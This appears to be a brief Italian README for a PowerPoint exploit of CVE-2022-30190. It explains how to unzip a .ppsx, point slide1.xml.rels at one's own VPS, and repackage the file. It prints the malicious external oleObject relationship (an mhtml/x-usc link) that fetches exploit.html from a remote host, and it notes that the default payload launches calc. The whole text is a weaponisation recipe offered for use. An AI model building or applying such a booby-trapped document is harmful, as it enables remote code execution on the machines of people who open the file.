
Questo è l'exploit di CVE-2022-30190 su PowerPoint.
Questo è l'exploit di CVE-2022-30190 su PowerPoint.
Modifica il suffisso del file in 'zip' e decomprimi il file; puoi modificare \ppt\slides\_rels\slide1.xml.rels e sostituirlo con il tuo IP:porta della VPS, in questo modo, poi ricomprimi come prima e cambia il suffisso in 'ppsx'. Il payload predefinito in 'exploit.html' esegue calc.
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>